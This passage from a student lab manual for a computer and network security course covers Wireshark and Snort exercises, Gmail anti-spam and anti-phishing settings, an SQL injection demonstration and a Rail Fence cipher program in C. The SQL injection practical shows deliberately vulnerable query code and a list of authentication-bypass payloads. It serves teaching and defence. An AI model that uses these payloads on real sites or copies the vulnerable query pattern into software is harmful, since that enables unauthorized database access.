Crowdsourcing also enables the use of IP reputation system that blocks repeated offenders, including botnet
resources which tend to be re-used by multiple perpetrators.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -18
Draw various Security Topologies.

DMZ

VLAN

TUNNELING

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

PRACTICAL -19

Demonstrate traffic analysis of different network protocols using tool. i.e. Wire-shark.

packet capture (packet sniffing) and network traffic analysis with the Wireshark
Download and install Wireshark on your PC.

Select a Network Interface to Capture Packets through.

Generate some network traffic with a Web Browser, such as Internet Explorer or Chrome. Your Wireshark
window should show the packets, and now look something like.
To stop the capture, select the Capture->Stop menu option, Ctrl+E, or the Stop toolbar button. What you have
created is a Packet Capture or ‘pcap’, which you can now view and analyse using the Wireshark interface, or
save to disk to analyse later.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
The capture is split into 3 parts:

1. Packet List Panel – this is a list of packets in the current capture. It colours the packets based on the protocol
type. When a packet is selected, the details are shown in the two panels below.

2. Packet Details Panel – this shows the details of the selected packet. It shows the different protocols making
up the layers of data for this packet. Layers include Frame, Ethernet, IP, TCP/UDP/ICMP, and application
protocols such as HTTP.

3. Packet Bytes Panel – shows the packet bytes in Hex and ASCII encodings.

To select more detailed options when starting a capture, select the Capture->Options menu option, or Ctrl+K,
or the Capture Options button on the toolbar (the wrench). This should show a window such as shown in Figure.

You can try various option available in wireshark and do the needful things.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
PRACTICAL -20

Demonstrate Sniffing using packet tool i.e. snort.

1. Download and install Snort and WinPcap

2. Open up a command prompt and navigate to the install folder C:\Snort\bin
3. To determine which network interface to use, type Snort –W

To capture some traffic we will be using the arguments -d -e and -v meaning that Snort output will show the IP
(Layer3), TCP/UDP/ICMP (Layer4) headers, and the packets data (Layer7). The –i 2 argument specifies packet
capture on the 2nd network interface.
4. Type snort -dev -i 2
5. Generate some network traffic
6. Abort the capture by pressing Ctrl+C
You will now see the captured traffic.

Snort can also log the traffic and write it to a file on the disk. This is done with the -l argument. Using the -K
ascii argument will tell Snort to write the info in ascii format.
7. Type snort -dev -i 2 -l C:\Snort\log -K ascii
8. Generate some network traffic
9. Abort the capture by pressing Ctrl+C
Now go the C:\Snort\log folder, you should see that the logged packets arranged by destination IP.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

Snort can also be used as an Intrusion Detection System (IDS), which means that it only picks up packets which
match certain rules. The Snort rules are set up in this order:

[ACTION] [PROTOCOL] [ADDRESS] [PORT] [DIRECTION] [ADDRESS] [PORT]

Where [ACTION] defines what action Snort is to take when encountering a packet that fits the criteria.
[PROTOCOL] defines what protocol the packets would have to be using. After that [ADDRESS] is the source
address (IP address) of the packet and the [PORT] defines the source port. [DIRECTION] Tells which way the
packet should be going and once again [ADDRESS] [PORT] tell the address and port where the packet is going
to.

10. In the folder C:\Snort\rules create the file rules.txt

11. Open the file and type alert tcp any 80 -> any any (content:”ifconfig”; msg:”ifconfig detected in
packet”; sid:999;)
12. Save and close the file

We will now try using this rule while sniffing traffic. The –k none argument, tells Snort not to ignore checksum
error packets.
ENROLLMENT NO:___________________________ PAGE NO:______________
COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

13. Type snort -dev -i 2 -l C:\Snort\log -K ascii -c C:\Snort\rules\rules.txt -k none

14. Visit the site ifconfig.dk and navigate around the site for a bit
15. Stop the capture by pressing Ctrl+C
A file called alert.ids should now have been produced in the C:\Snort\log folder.

As said this is only the basics of what Snort can do. It can be configured to capture close to anything running
though you Ethernet card. Also there are a lot of preconfigured rules and plugins which can help determine what
kind of activity is happening on a network. An example would be to pick up on a Nmap scan of the network.

ENROLLMENT NO:___________________________ PAGE NO:______________

 COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
PRACTICAL -21

Configure your e-mail account against various threats. i.e. spam attack, phising, spoofing etc.

Set up a spam filter in gmail

1. Sign in to your Google Admin console.

Sign in using your administrator account (does not end in @gmail.com).

2. From the Admin console dashboard, go to Apps G Suite Gmail Advanced settings.
Tip: To see Advanced settings, scroll to the bottom of the Gmail page.

3. (Optional) On the left, select an organization.

4. Scroll to the Spam section, hover over the setting, and click Configure. If the setting is already configured,
hover over the setting and click Edit or Add Another.

5. For a new setting, enter a unique name.

6. To configure more aggressive spam filtering, check the Be more aggressive when filtering spam box. If you
select this option, it's likely that more messages will be marked spam and sent to your users' spam folders.
7. To bypass spam filters for messages from users in the same organization, check the Bypass spam filters for
messages received from internal senders box.
8. To bypass spam filters for messages from addresses or domains specified in an approved sender list:
1. Check the Bypass spam filters for messages received from addresses or domains within these
approved senders lists box.
2. Click Use existing or create a new one, enter a new list name, and click Create.
3. To use an existing list as your approved sender list, click the list name.
To add email addresses or domains to a list:
4. Hover over the list name, click Edit, and then click Add.
5. Enter an email address or domain name.
Important: Use the Do not require sender authentication option with caution as it can lead to spoofing.
The option bypasses the spam folder for approved senders that don't have authentication, such as SPF or
DKIM, enabled.
6. Click Save.
7. Repeat the steps to add more email addresses or domains to the list.

9. To send filtered messages to Admin Quarantine for review, check the Put spam in administrative
quarantine box. If you select this option, spam messages are never directed to users' spam folders. If you are
using the Message Center, spam messages aren't directed to the Message Center. A message that's released
from quarantine is delivered directly to the user's Gmail inbox or non-Gmail mailbox.

10. Click Add Setting.

11. At the bottom of the Gmail Advanced setting page, click Save.
Protect email account from phishing

1. Review and verify current OAuth API access by third-parties.

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
2. Run OAuth Token audit log reports to catch future inadvertent scope grants and set up automated email
alerts in the Admin console using the custom alerts feature, or script it with the Reports API.

3. Turn on two-step verification for your organization and use security keys.

4. Follow the security checklist if you feel that an account may be compromised.

5. Help prevent abuse of your brand in phishing attacks by publishing a DMARC policy for your
organization.

6. Use and enforce rules for S/MIME encryption.

How to Stop Email Spoofing in G Suite

 Disable outbound gateways (Settings for Gmail > Advanced settings)

 Discard the email; Catch-all address (Settings for Gmail > Advances settings)
 Authenticate email with DKIM (Settings for Gmail > Authenticate Email)

PRACTICAL -22

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
Draw diagram Host-based Intrusion Detection System

PRACTICAL -23

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
Draw diagram Network-based Intrusion Detection System

PRACTICAL -24

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
Demonstration of SQL-Injection.

SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements
(also commonly referred to as a malicious payload) that control a web application’s database server (also
commonly referred to as a Relational Database Management System – RDBMS). Since an SQL Injection
vulnerability could possibly affect any website or web application that makes use of an SQL-based database, the
vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.
By leveraging an SQL Injection vulnerability, given the right circumstances, an attacker can use it to bypass a
web application’s authentication and authorization mechanisms and retrieve the contents of an entire database.
SQL Injection can also be used to add, modify and delete records in a database, affecting data integrity.
To such an extent, SQL Injection can provide an attacker with unauthorized access to sensitive data including,
customer data, personally identifiable information (PII), trade secrets, intellectual property and other sensitive
information.
In order to run malicious SQL queries against a database server, an attacker must first find an input within the
web application that is included inside of an SQL query.
In order for an SQL Injection attack to take place, the vulnerable website needs to directly include user input
within an SQL statement. An attacker can then insert a payload that will be included as part of the SQL query
and run against the database server.
The following server-side pseudo-code is used to authenticate users to the web application.

# Define POST variables

uname = request.POST['username']
passwd = request.POST['password']

# SQL query vulnerable to SQLi

sql = “SELECT id FROM users WHERE username=’” + uname + “’ AND password=’” + passwd + “’”

# Execute the SQL statement

database.execute(sql)
The above script is a simple example of authenticating a user with a username and a password against a database
with a table named users, and a username and password column.
The above script is vulnerable to SQL Injection because an attacker could submit malicious input in such a way
that would alter the SQL statement being executed by the database server.
A simple example of an SQL Injection payload could be something as simple as setting the password field
to password’ OR 1=1.
This would result in the following SQL query being run against the database server.

SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’

An attacker can also comment out the rest of the SQL statement to control the execution of the SQL query
further.

-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite

' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.
Once the query executes, the result is returned to the application to be processed, resulting in an authentication
bypass. In the event of authentication bypass being possible, the application will most likely log the attacker in
with the first account from the query result — the first account in a database is usually of an administrative user.

What’s the worst an attacker can do with SQL?

SQL is a programming language designed for managing data stored in an RDBMS, therefore SQL can be used to
access, modify and delete data. Furthermore, in specific cases, an RDBMS could also run commands on the
operating system from an SQL statement.Keeping the above in mind, when considering the following, it’s easier
to understand how lucrative a successful SQL Injection attack can be for an attacker.

 An attacker can use SQL Injection to bypass authentication or even impersonate specific users.
 One of SQL’s primary functions is to select data based on a query and output the result of that query. An
SQL Injection vulnerability could allow the complete disclosure of data residing on a database server.
 Since web applications use SQL to alter data within a database, an attacker could use SQL Injection to
alter data stored in a database. Altering data affects data integrity and could cause repudiation issues, for
instance, issues such as voiding transactions, altering balances and other records.
 SQL is used to delete records from a database. An attacker could use an SQL Injection vulnerability to
delete data from a database. Even if an appropriate backup strategy is employed, deletion of data could
affect an application’s availability until the database is restored.
 Some database servers are configured (intentional or otherwise) to allow arbitrary execution of operating
system commands on the database server. Given the right conditions, an attacker could use SQL
Injection as the initial vector in an attack of an internal network that sits behind a firewall.

PRACTICAL -25

Demonstration of readymade encryption/decryption code

ENROLLMENT NO:___________________________ PAGE NO:______________
 COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

Rail Fence cipher

#include<stdio.h>
#include<conio.h>
#include<string.h>
void main()
{
char pt[100],en1[100],en2[100],dec[100];
int i,j=0,k;
clrscr();
printf("==================>Rail Fence Encryption-Decryption Technique<===============\n\
n\n\n\n");
printf("Enter the Plain Text:-");
scanf("%s",&pt);
printf("\nYour Plain Text:-%s",pt);
printf("\n\n\n");
//================Encryption==================
for(i=0;i<strlen(pt);i=i+2)
{
en1[j]=pt[i];
en2[j]=pt[i+1];
j++;
}
en1[j]='\0';
en2[j]='\0';
printf("Encrypted Text is:-");
printf("%s",en1);
printf("%s",en2);
//================Decryption==================
j=0;
for(i=0;i<strlen(en1);i++)
{
dec[j]=en1[i];
dec[j+1]=en2[i];
j=j+2;
}
dec[j]='\0';
printf("\n\nDecrypted Text is:-%s",dec);
getch();
}

Output:-

ENROLLMENT NO:___________________________ PAGE NO:______________

COMPUTER AND NETWORK SECURITY(3350704) 5TH C.E.

ENROLLMENT NO:___________________________ PAGE NO:______________